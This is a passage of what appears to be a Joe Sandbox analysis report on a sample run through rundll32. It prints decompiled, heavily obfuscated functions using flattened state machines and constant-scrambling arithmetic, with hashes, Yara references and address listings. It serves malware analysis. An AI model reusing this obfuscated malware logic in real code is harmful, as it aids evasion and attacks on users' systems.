                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: A~$*
                                                                                                                      • API String ID: 0-472959745
                                                                                                                      • Opcode ID: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction ID: 08efc000244c6a2e5130f5e3515ca5fb7b69ff7697cc9c2fb7e8ba2045fa0289
                                                                                                                      • Opcode Fuzzy Hash: 26ffb21ea4de1e855063fb1c6cd638f33f61a66a964de79051ee85dfae76ed2a
                                                                                                                      • Instruction Fuzzy Hash: 56B15172818380AFC758CF65C58981BFBE1BBC4748F118A1DF9A696260D3B18949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003541A7 Relevance: 2.7, Strings: 2, Instructions: 215COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E003541A7() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				signed int _t227;
				intOrPtr _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				void* _t233;
				void* _t251;
				signed int* _t255;

				_t255 =  &_v100;
				_v68 = 0xec424;
				_v68 = _v68 | 0x15a76721;
				_v68 = _v68 + 0xba51;
				_v68 = _v68 ^ 0x95b0a177;
				_v32 = 0x9cb342;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x0000013b;
				_v72 = 0xae6f3e;
				_v72 = _v72 >> 0xb;
				_v4 = 0;
				_v72 = _v72 * 0x1b;
				_t251 = 0x38ba83c;
				_v72 = _v72 ^ 0x000cf0a1;
				_v40 = 0xd29c0d;
				_v40 = _v40 | 0x0be9fd1c;
				_v40 = _v40 ^ 0x0bf96d7b;
				_v96 = 0x10a61a;
				_v96 = _v96 + 0x673b;
				_v96 = _v96 + 0x336d;
				_v96 = _v96 + 0x2fcb;
				_v96 = _v96 ^ 0x001323ac;
				_v100 = 0x9d3afd;
				_v100 = _v100 << 7;
				_v100 = _v100 << 5;
				_t230 = 0x55;
				_v100 = _v100 / _t230;
				_v100 = _v100 ^ 0x027b67ec;
				_v84 = 0x9cb324;
				_v84 = _v84 + 0xffffbca6;
				_v84 = _v84 + 0xd0f1;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x750d3d14;
				_v88 = 0x3cd70;
				_v88 = _v88 << 0xc;
				_v88 = _v88 + 0x865d;
				_t231 = 0x65;
				_v88 = _v88 / _t231;
				_v88 = _v88 ^ 0x009e1e24;
				_v24 = 0xf6c479;
				_v24 = _v24 ^ 0xf85d6d57;
				_v24 = _v24 ^ 0xf8a5b53e;
				_v92 = 0xa4533c;
				_v92 = _v92 << 8;
				_v92 = _v92 << 0xf;
				_v92 = _v92 ^ 0x907f3c14;
				_v92 = _v92 ^ 0x0e792839;
				_v28 = 0xd04f15;
				_v28 = _v28 * 0x53;
				_v28 = _v28 ^ 0x4380c19a;
				_v36 = 0x6fba0d;
				_v36 = _v36 * 0x6b;
				_v36 = _v36 ^ 0x2ebab037;
				_v20 = 0x23d496;
				_v20 = _v20 ^ 0x4cebd1bd;
				_v20 = _v20 ^ 0x4cc2ad40;
				_v60 = 0x3b5a6d;
				_v60 = _v60 >> 0x10;
				_v60 = _v60 << 7;
				_v60 = _v60 ^ 0x0000f98a;
				_v64 = 0xf0d036;
				_v64 = _v64 + 0xffff53b4;
				_v64 = _v64 ^ 0x894664b9;
				_v64 = _v64 ^ 0x89bf3867;
				_v48 = 0xb08deb;
				_v48 = _v48 | 0x78ca9a10;
				_v48 = _v48 + 0xffff33de;
				_v48 = _v48 ^ 0x78fbc05b;
				_v16 = 0x2da7c5;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00092ddb;
				_v52 = 0x523898;
				_t232 = 0x59;
				_t227 = _v4;
				_v52 = _v52 / _t232;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0x01d201e4;
				_v56 = 0x19cc06;
				_v56 = _v56 + 0xfffff128;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0x6f4387c2;
				_v76 = 0x5278ca;
				_v76 = _v76 << 9;
				_v76 = _v76 ^ 0x8826d706;
				_t233 = 0x5c;
				_v76 = _v76 * 0x5a;
				_v76 = _v76 ^ 0xc3a97567;
				_v12 = 0xdfbc19;
				_v12 = _v12 + 0xffff7584;
				_v12 = _v12 ^ 0x00deabf9;
				_v44 = 0x7b85bc;
				_v44 = _v44 * 9;
				_v44 = _v44 ^ 0xa28277a7;
				_v44 = _v44 ^ 0xa6d14151;
				_v80 = 0xd07577;
				_v80 = _v80 | 0x5043dc19;
				_v80 = _v80 * 0x49;
				_v80 = _v80 * 0x43;
				_v80 = _v80 ^ 0x4228a280;
				while(1) {
					L1:
					_t218 = 0x35852e4;
					do {
						while(_t251 != _t218) {
							if(_t251 == 0x38ba83c) {
								_t251 = 0xe9ff08f;
								continue;
							} else {
								if(_t251 == 0x83f204b) {
									E00347AF8(_v76, _v12, _v8, _v44, _v80);
								} else {
									if(_t251 == 0xe0715ba) {
										_push(_v100);
										_push(_v96);
										_t238 = _v72;
										_push(0x34118c);
										__eflags = E00348786(_v84, _v40, _v72,  &_v8, _v88, E0034AB66(_v72, _v40, __eflags), _v24, _v92, _v72, _t238, _v28, _v32, _v68, _t238, _v36);
										_t251 =  ==  ? 0x35852e4 : 0xdf478d7;
										E0034AE03(_v20, _v60, _v64, _t222);
										_t255 =  &(_t255[0x12]);
										L14:
										_t218 = 0x35852e4;
										_t233 = 0x5c;
										goto L15;
									} else {
										if(_t251 != 0xe9ff08f) {
											goto L15;
										} else {
											_t228 =  *0x36520c; // 0x0
											_t229 = _t228 + 0x220;
											while( *_t229 != _t233) {
												_t229 = _t229 + 2;
												__eflags = _t229;
											}
											_t227 = _t229 + 2;
											_t251 = 0xe0715ba;
											goto L1;
										}
									}
								}
							}
							L18:
							return _v4;
						}
						_t219 = E0034EFA6(_v48, _v16, _t227, _v52, _v8, _v56);
						_t255 =  &(_t255[4]);
						__eflags = _t219;
						_t251 = 0x83f204b;
						_t196 = _t219 == 0;
						__eflags = _t196;
						_v4 = 0 | _t196;
						goto L14;
						L15:
						__eflags = _t251 - 0xdf478d7;
					} while (__eflags != 0);
					goto L18;
				}
			}







































                                                                                                                      0x003541a7
                                                                                                                      0x003541aa
                                                                                                                      0x003541b4
                                                                                                                      0x003541be
                                                                                                                      0x003541c6
                                                                                                                      0x003541ce
                                                                                                                      0x003541d6
                                                                                                                      0x003541db
                                                                                                                      0x003541e3
                                                                                                                      0x003541eb
                                                                                                                      0x003541f0
                                                                                                                      0x003541fd
                                                                                                                      0x00354201
                                                                                                                      0x00354206
                                                                                                                      0x0035420e
                                                                                                                      0x00354216
                                                                                                                      0x0035421e
                                                                                                                      0x00354226
                                                                                                                      0x0035422e
                                                                                                                      0x00354236
                                                                                                                      0x0035423e
                                                                                                                      0x00354246
                                                                                                                      0x0035424e
                                                                                                                      0x00354256
                                                                                                                      0x0035425b
                                                                                                                      0x00354266
                                                                                                                      0x0035426b
                                                                                                                      0x00354271
                                                                                                                      0x00354279
                                                                                                                      0x00354281
                                                                                                                      0x00354289
                                                                                                                      0x00354291
                                                                                                                      0x00354296
                                                                                                                      0x0035429e
                                                                                                                      0x003542a6
                                                                                                                      0x003542ab
                                                                                                                      0x003542b7
                                                                                                                      0x003542ba
                                                                                                                      0x003542be
                                                                                                                      0x003542c6
                                                                                                                      0x003542ce
                                                                                                                      0x003542d6
                                                                                                                      0x003542de
                                                                                                                      0x003542e6
                                                                                                                      0x003542eb
                                                                                                                      0x003542f0
                                                                                                                      0x003542f8
                                                                                                                      0x00354300
                                                                                                                      0x0035430d
                                                                                                                      0x00354311
                                                                                                                      0x00354319
                                                                                                                      0x00354326
                                                                                                                      0x0035432a
                                                                                                                      0x00354332
                                                                                                                      0x0035433a
                                                                                                                      0x00354342
                                                                                                                      0x0035434a
                                                                                                                      0x00354352
                                                                                                                      0x00354357
                                                                                                                      0x0035435c
                                                                                                                      0x00354364
                                                                                                                      0x0035436c
                                                                                                                      0x00354374
                                                                                                                      0x0035437c
                                                                                                                      0x00354384
                                                                                                                      0x0035438c
                                                                                                                      0x00354394
                                                                                                                      0x0035439e
                                                                                                                      0x003543ab
                                                                                                                      0x003543b3
                                                                                                                      0x003543b8
                                                                                                                      0x003543c0
                                                                                                                      0x003543ce
                                                                                                                      0x003543d1
                                                                                                                      0x003543d5
                                                                                                                      0x003543d9
                                                                                                                      0x003543de
                                                                                                                      0x003543e6
                                                                                                                      0x003543ee
                                                                                                                      0x003543f6
                                                                                                                      0x003543fb
                                                                                                                      0x00354403
                                                                                                                      0x0035440b
                                                                                                                      0x00354410
                                                                                                                      0x0035441f
                                                                                                                      0x00354420
                                                                                                                      0x00354424
                                                                                                                      0x0035442c
                                                                                                                      0x00354434
                                                                                                                      0x0035443c
                                                                                                                      0x00354444
                                                                                                                      0x00354451
                                                                                                                      0x00354455
                                                                                                                      0x0035445d
                                                                                                                      0x00354465
                                                                                                                      0x0035446d
                                                                                                                      0x0035447a
                                                                                                                      0x00354483
                                                                                                                      0x00354487
                                                                                                                      0x0035448f
                                                                                                                      0x0035448f
                                                                                                                      0x0035448f
                                                                                                                      0x00354494
                                                                                                                      0x00354494
                                                                                                                      0x003544a2
                                                                                                                      0x00354558
                                                                                                                      0x00000000
                                                                                                                      0x003544a8
                                                                                                                      0x003544ae
                                                                                                                      0x003545b9
                                                                                                                      0x003544b4
                                                                                                                      0x003544b6
                                                                                                                      0x003544e1
                                                                                                                      0x003544e5
                                                                                                                      0x003544ed
                                                                                                                      0x003544f1
                                                                                                                      0x0035452f
                                                                                                                      0x0035454b
                                                                                                                      0x0035454e
                                                                                                                      0x00354553
                                                                                                                      0x0035458f
                                                                                                                      0x00354591
                                                                                                                      0x00354596
                                                                                                                      0x00000000
                                                                                                                      0x003544b8
                                                                                                                      0x003544be
                                                                                                                      0x00000000
                                                                                                                      0x003544c4
                                                                                                                      0x003544c4
                                                                                                                      0x003544ca
                                                                                                                      0x003544d5
                                                                                                                      0x003544d2
                                                                                                                      0x003544d2
                                                                                                                      0x003544d2
                                                                                                                      0x003544da
                                                                                                                      0x003544dd
                                                                                                                      0x00000000
                                                                                                                      0x003544dd
                                                                                                                      0x003544be
                                                                                                                      0x003544b6
                                                                                                                      0x003544ae
                                                                                                                      0x003545c1
                                                                                                                      0x003545cc
                                                                                                                      0x003545cc
                                                                                                                      0x00354577
                                                                                                                      0x0035457e
                                                                                                                      0x00354581
                                                                                                                      0x00354583
                                                                                                                      0x00354588
                                                                                                                      0x00354588
                                                                                                                      0x0035458b
                                                                                                                      0x00000000
                                                                                                                      0x00354597
                                                                                                                      0x00354597
                                                                                                                      0x00354597
                                                                                                                      0x00000000
                                                                                                                      0x003545a3

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: m3$mZ;
                                                                                                                      • API String ID: 0-2099856273
                                                                                                                      • Opcode ID: d2820ce15e67a8c1b3fdc2cc6c36988351b5d1705ecb523ec60d09aa6cd659ae
                                                                                                                      • Instruction ID: 526989d15638a1daf0916be80c375a9cc00ef1fd1f8ecf0ab2da353b6482654e
                                                                                                                      • Opcode Fuzzy Hash: d2820ce15e67a8c1b3fdc2cc6c36988351b5d1705ecb523ec60d09aa6cd659ae
                                                                                                                      • Instruction Fuzzy Hash: E0A121B25093809FC359CF25D98981BBBF1BBC9748F104A1DF6969A260D3B1CA49CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035FF31 Relevance: 2.7, Strings: 2, Instructions: 176COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0035FF31(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				void* _t147;
				intOrPtr _t161;
				signed int _t169;
				void* _t172;
				void* _t188;
				intOrPtr* _t189;
				void* _t191;
				void* _t192;

				_push(_a12);
				_t188 = __edx;
				_t189 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_t147);
				_v60 = 0xe50c8f;
				_v56 = 0;
				_t192 = _t191 + 0x14;
				_v52 = 0;
				_v76 = 0x2f3c66;
				_t172 = 0x80c5f05;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00179e33;
				_v100 = 0xdfcc0f;
				_v100 = _v100 + 0x5dbe;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x00087c2f;
				_v112 = 0xadc62;
				_v112 = _v112 | 0x1372df76;
				_v112 = _v112 >> 7;
				_v112 = _v112 ^ 0x002d2981;
				_v116 = 0xfe909d;
				_v116 = _v116 << 7;
				_t169 = 0x44;
				_v116 = _v116 / _t169;
				_v116 = _v116 >> 0xc;
				_v116 = _v116 ^ 0x0009e39a;
				_v120 = 0xded18e;
				_v120 = _v120 + 0xffff5063;
				_v120 = _v120 ^ 0xd3175283;
				_v120 = _v120 * 0x6d;
				_v120 = _v120 ^ 0x2cc94156;
				_v124 = 0xc7fb01;
				_v124 = _v124 + 0xffff9b92;
				_v124 = _v124 | 0x8f919799;
				_v124 = _v124 + 0xaff8;
				_v124 = _v124 ^ 0x8fd45f25;
				_v68 = 0xadf2f0;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0x056cc5e6;
				_v72 = 0x9db552;
				_v72 = _v72 << 6;
				_v72 = _v72 ^ 0x276b9b1e;
				_v64 = 0x9edb03;
				_v64 = _v64 ^ 0x7ad40136;
				_v64 = _v64 ^ 0x7a416b45;
				_v96 = 0x899086;
				_v96 = _v96 + 0x3abe;
				_v96 = _v96 + 0xffff9b83;
				_v96 = _v96 ^ 0x008dc818;
				_v80 = 0x1613a8;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x000fe8a1;
				_v84 = 0xc2e1e1;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x0c264902;
				_v104 = 0x78369d;
				_v104 = _v104 ^ 0x8f03ebf2;
				_v104 = _v104 * 0x5b;
				_v104 = _v104 ^ 0x010dd9c3;
				_v88 = 0x6e061c;
				_v88 = _v88 * 0x7f;
				_v88 = _v88 >> 6;
				_v88 = _v88 ^ 0x00d4f969;
				_v92 = 0x56c027;
				_v92 = _v92 ^ 0x48eed99d;
				_v92 = _v92 + 0xffff6999;
				_v92 = _v92 ^ 0x48bab2c5;
				_v108 = 0xffa91b;
				_v108 = _v108 * 0x23;
				_v108 = _v108 | 0x4c85b786;
				_v108 = _v108 * 0x3a;
				_v108 = _v108 ^ 0x23a92266;
				do {
					while(_t172 != 0xd9dda6) {
						if(_t172 == 0x1ff9304) {
							E00354D91( *((intOrPtr*)(_t188 + 0x14)),  &_v48, _v64, _v96);
							_t192 = _t192 + 8;
							_t172 = 0xcf0dfe0;
							continue;
						} else {
							if(_t172 == 0x2f8759c) {
								_push(_t172);
								_push(_t172);
								_t161 = E00353512( *(_t189 + 4));
								 *_t189 = _t161;
								__eflags = _t161;
								if(__eflags != 0) {
									_t172 = 0x3d5ab39;
									continue;
								}
							} else {
								if(_t172 == 0x3d5ab39) {
									E003564C5(_v120, _v124, _v68, _v72, _t189,  &_v48);
									_t192 = _t192 + 0x10;
									_t172 = 0x1ff9304;
									continue;
								} else {
									if(_t172 == 0x80c5f05) {
										_t172 = 0xd9dda6;
										 *_t189 = 0;
										 *(_t189 + 4) = _v76;
										continue;
									} else {
										if(_t172 == 0xcf0dfe0) {
											E0035F88F(_t188 + 0xc,  &_v48, __eflags, _v80, _v84, _v104);
											_t192 = _t192 + 0xc;
											_t172 = 0xfec6e86;
											continue;
										} else {
											_t201 = _t172 - 0xfec6e86;
											if(_t172 != 0xfec6e86) {
												goto L17;
											} else {
												E0035F88F(_t188 + 4,  &_v48, _t201, _v88, _v92, _v108);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t189 != 0x00000000;
					}
					 *(_t189 + 4) = E0035542E(_t188);
					_t172 = 0x2f8759c;
					L17:
					__eflags = _t172 - 0x1551776;
				} while (__eflags != 0);
				goto L9;
			}































                                                                                                                      0x0035ff3b
                                                                                                                      0x0035ff42
                                                                                                                      0x0035ff44
                                                                                                                      0x0035ff46
                                                                                                                      0x0035ff4d
                                                                                                                      0x0035ff54
                                                                                                                      0x0035ff55
                                                                                                                      0x0035ff56
                                                                                                                      0x0035ff5b
                                                                                                                      0x0035ff65
                                                                                                                      0x0035ff69
                                                                                                                      0x0035ff6c
                                                                                                                      0x0035ff72
                                                                                                                      0x0035ff7a
                                                                                                                      0x0035ff7f
                                                                                                                      0x0035ff83
                                                                                                                      0x0035ff8b
                                                                                                                      0x0035ff93
                                                                                                                      0x0035ff9b
                                                                                                                      0x0035ffa0
                                                                                                                      0x0035ffa8
                                                                                                                      0x0035ffb0
                                                                                                                      0x0035ffb8
                                                                                                                      0x0035ffbd
                                                                                                                      0x0035ffc5
                                                                                                                      0x0035ffcd
                                                                                                                      0x0035ffd8
                                                                                                                      0x0035ffdb
                                                                                                                      0x0035ffdf
                                                                                                                      0x0035ffe4
                                                                                                                      0x0035ffec
                                                                                                                      0x0035fff4
                                                                                                                      0x0035fffc
                                                                                                                      0x00360009
                                                                                                                      0x0036000d
                                                                                                                      0x00360015
                                                                                                                      0x0036001d
                                                                                                                      0x00360025
                                                                                                                      0x0036002d
                                                                                                                      0x00360035
                                                                                                                      0x0036003d
                                                                                                                      0x00360045
                                                                                                                      0x0036004a
                                                                                                                      0x00360052
                                                                                                                      0x0036005a
                                                                                                                      0x0036005f
                                                                                                                      0x00360067
                                                                                                                      0x0036006f
                                                                                                                      0x00360077
                                                                                                                      0x0036007f
                                                                                                                      0x00360087
                                                                                                                      0x0036008f
                                                                                                                      0x00360097
                                                                                                                      0x0036009f
                                                                                                                      0x003600a7
                                                                                                                      0x003600ac
                                                                                                                      0x003600b4
                                                                                                                      0x003600bc
                                                                                                                      0x003600c1
                                                                                                                      0x003600c9
                                                                                                                      0x003600d1
                                                                                                                      0x003600de
                                                                                                                      0x003600e2
                                                                                                                      0x003600ea
                                                                                                                      0x003600f7
                                                                                                                      0x003600fb
                                                                                                                      0x00360100
                                                                                                                      0x00360108
                                                                                                                      0x00360110
                                                                                                                      0x00360118
                                                                                                                      0x00360125
                                                                                                                      0x0036012d
                                                                                                                      0x0036013a
                                                                                                                      0x0036013e
                                                                                                                      0x0036014b
                                                                                                                      0x0036014f
                                                                                                                      0x00360157
                                                                                                                      0x00360157
                                                                                                                      0x00360169
                                                                                                                      0x00360264
                                                                                                                      0x00360269
                                                                                                                      0x0036026c
                                                                                                                      0x00000000
                                                                                                                      0x0036016f
                                                                                                                      0x00360175
                                                                                                                      0x00360238
                                                                                                                      0x00360239
                                                                                                                      0x0036023d
                                                                                                                      0x00360242
                                                                                                                      0x00360246
                                                                                                                      0x00360248
                                                                                                                      0x0036024e
                                                                                                                      0x00000000
                                                                                                                      0x0036024e
                                                                                                                      0x0036017b
                                                                                                                      0x0036017d
                                                                                                                      0x0036021a
                                                                                                                      0x0036021f
                                                                                                                      0x00360222
                                                                                                                      0x00000000
                                                                                                                      0x00360183
                                                                                                                      0x00360189
                                                                                                                      0x003601f5
                                                                                                                      0x003601fa
                                                                                                                      0x003601fc
                                                                                                                      0x00000000
                                                                                                                      0x0036018b
                                                                                                                      0x00360191
                                                                                                                      0x003601df
                                                                                                                      0x003601e4
                                                                                                                      0x003601e7
                                                                                                                      0x00000000
                                                                                                                      0x00360193
                                                                                                                      0x00360193
                                                                                                                      0x00360199
                                                                                                                      0x00000000
                                                                                                                      0x0036019f
                                                                                                                      0x003601b2
                                                                                                                      0x003601b7
                                                                                                                      0x00360199
                                                                                                                      0x00360191
                                                                                                                      0x00360189
                                                                                                                      0x0036017d
                                                                                                                      0x00360175
                                                                                                                      0x003601bb
                                                                                                                      0x003601cb
                                                                                                                      0x003601cb
                                                                                                                      0x0036027d
                                                                                                                      0x00360280
                                                                                                                      0x00360285
                                                                                                                      0x00360285
                                                                                                                      0x00360285
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: EkAz$f</
                                                                                                                      • API String ID: 0-1101062405
                                                                                                                      • Opcode ID: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction ID: 4b5c24ddb1c9c3de0fd7289f9dd6f0773dc68bcaf8430ba2e0086b325635bebc
                                                                                                                      • Opcode Fuzzy Hash: 176f34a4d972b3be30e831d244042a966be3787b960c3fd105b0c124aa8a18ff
                                                                                                                      • Instruction Fuzzy Hash: A68123B10083419FC36ACF65C98A81BFBF1FBC5748F509A1DF59A46260D7B19A49CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035C9A9 Relevance: 2.7, Strings: 2, Instructions: 163COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0035C9A9(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t147;
				void* _t168;
				void* _t171;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int* _t195;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0034CF25(_t147);
				_v60 = 0x2183dd;
				_t195 =  &(( &_v64)[6]);
				_v60 = _v60 << 0xc;
				_v60 = _v60 << 0xf;
				_t192 = 0;
				_t171 = 0xa488efe;
				_t188 = 0x78;
				_v60 = _v60 * 0xa;
				_v60 = _v60 ^ 0x10000001;
				_v44 = 0xe22f1a;
				_v44 = _v44 + 0xffffab53;
				_v44 = _v44 / _t188;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x00003c3b;
				_v36 = 0x9a4ce6;
				_v36 = _v36 + 0xffffe16e;
				_v36 = _v36 | 0x72a3b0b5;
				_v36 = _v36 ^ 0x32bbbef5;
				_v28 = 0xd892e4;
				_v28 = _v28 | 0x189bde37;
				_v28 = _v28 ^ 0x998d043c;
				_v28 = _v28 ^ 0xc156dacb;
				_v20 = 0xff0234;
				_v20 = _v20 + 0xffffad5b;
				_v20 = _v20 ^ 0x00f1fad0;
				_v40 = 0xdc05b;
				_v40 = _v40 ^ 0xb55e20f9;
				_t189 = 3;
				_v40 = _v40 / _t189;
				_v40 = _v40 ^ 0x3c7a3b1c;
				_v64 = 0x518ad0;
				_v64 = _v64 ^ 0x6bfb13ad;
				_v64 = _v64 << 2;
				_t190 = 0x6a;
				_v64 = _v64 * 7;
				_v64 = _v64 ^ 0xc6a3f60b;
				_v24 = 0x25f852;
				_v24 = _v24 + 0xffff91c6;
				_v24 = _v24 ^ 0x002d038f;
				_v32 = 0x681d6c;
				_v32 = _v32 ^ 0x9f49642f;
				_v32 = _v32 * 0x3a;
				_v32 = _v32 ^ 0x0d93f477;
				_v56 = 0xa4373;
				_v56 = _v56 >> 9;
				_v56 = _v56 << 0xb;
				_v56 = _v56 << 9;
				_v56 = _v56 ^ 0x521bad52;
				_v16 = 0x3abafe;
				_v16 = _v16 | 0x2531d7a0;
				_v16 = _v16 ^ 0x25301684;
				_v48 = 0x8b99e8;
				_v48 = _v48 ^ 0x8a9a3b2d;
				_v48 = _v48 * 0x56;
				_v48 = _v48 / _t190;
				_v48 = _v48 ^ 0x00e0af40;
				_v8 = 0xf2305e;
				_v8 = _v8 | 0x3a3bb36f;
				_v8 = _v8 ^ 0x3af325a3;
				_v52 = 0xa4558c;
				_v52 = _v52 >> 0xe;
				_v52 = _v52 << 0xd;
				_v52 = _v52 + 0xad08;
				_v52 = _v52 ^ 0x0057bd84;
				_v12 = 0xb8a572;
				_v12 = _v12 | 0x00b7603c;
				_v12 = _v12 ^ 0x00ba29b3;
				while(_t171 != 0x263a30c) {
					if(_t171 == 0x50e379a) {
						_push(_t171);
						_push(_t171);
						_t192 = E00353512(_v4 + _v4);
						if(_t192 != 0) {
							_t171 = 0x263a30c;
							continue;
						}
					} else {
						if(_t171 == 0xa488efe) {
							_t171 = 0xdc1694f;
							continue;
						} else {
							if(_t171 != 0xdc1694f) {
								L11:
								if(_t171 != 0xa17b831) {
									continue;
								}
							} else {
								_t168 = E0035D2A8(0, _v36 | _v60, _v20, _a16, _v40, _v64, _a8, _v24,  &_v4);
								_t195 =  &(_t195[7]);
								if(_t168 != 0) {
									_t171 = 0x50e379a;
									continue;
								}
							}
						}
					}
					return _t192;
				}
				E0035D2A8(_t192, _v28 | _v44, _v48, _a16, _v8, _v52, _a8, _v12,  &_v4);
				_t195 =  &(_t195[7]);
				_t171 = 0xa17b831;
				goto L11;
			}




























                                                                                                                      0x0035c9b0
                                                                                                                      0x0035c9b4
                                                                                                                      0x0035c9b8
                                                                                                                      0x0035c9bc
                                                                                                                      0x0035c9c0
                                                                                                                      0x0035c9c2
                                                                                                                      0x0035c9c7
                                                                                                                      0x0035c9cf
                                                                                                                      0x0035c9d2
                                                                                                                      0x0035c9d9
                                                                                                                      0x0035c9de
                                                                                                                      0x0035c9e5
                                                                                                                      0x0035c9ec
                                                                                                                      0x0035c9ef
                                                                                                                      0x0035c9f3
                                                                                                                      0x0035c9fb
                                                                                                                      0x0035ca03
                                                                                                                      0x0035ca13
                                                                                                                      0x0035ca17
                                                                                                                      0x0035ca1c
                                                                                                                      0x0035ca24
                                                                                                                      0x0035ca2c
                                                                                                                      0x0035ca34
                                                                                                                      0x0035ca3c
                                                                                                                      0x0035ca44
                                                                                                                      0x0035ca4c
                                                                                                                      0x0035ca54
                                                                                                                      0x0035ca5c
                                                                                                                      0x0035ca64
                                                                                                                      0x0035ca6c
                                                                                                                      0x0035ca74
                                                                                                                      0x0035ca7c
                                                                                                                      0x0035ca84
                                                                                                                      0x0035ca90
                                                                                                                      0x0035ca95
                                                                                                                      0x0035ca9b
                                                                                                                      0x0035caa3
                                                                                                                      0x0035caab
                                                                                                                      0x0035cab3
                                                                                                                      0x0035cabd
                                                                                                                      0x0035cabe
                                                                                                                      0x0035cac2
                                                                                                                      0x0035caca
                                                                                                                      0x0035cad2
                                                                                                                      0x0035cada
                                                                                                                      0x0035cae2
                                                                                                                      0x0035caea
                                                                                                                      0x0035caf7
                                                                                                                      0x0035cafb
                                                                                                                      0x0035cb03
                                                                                                                      0x0035cb0b
                                                                                                                      0x0035cb10
                                                                                                                      0x0035cb15
                                                                                                                      0x0035cb1a
                                                                                                                      0x0035cb22
                                                                                                                      0x0035cb2a
                                                                                                                      0x0035cb32
                                                                                                                      0x0035cb3a
                                                                                                                      0x0035cb42
                                                                                                                      0x0035cb4f
                                                                                                                      0x0035cb59
                                                                                                                      0x0035cb62
                                                                                                                      0x0035cb6f
                                                                                                                      0x0035cb7c
                                                                                                                      0x0035cb84
                                                                                                                      0x0035cb8c
                                                                                                                      0x0035cb94
                                                                                                                      0x0035cb99
                                                                                                                      0x0035cb9e
                                                                                                                      0x0035cba6
                                                                                                                      0x0035cbae
                                                                                                                      0x0035cbb6
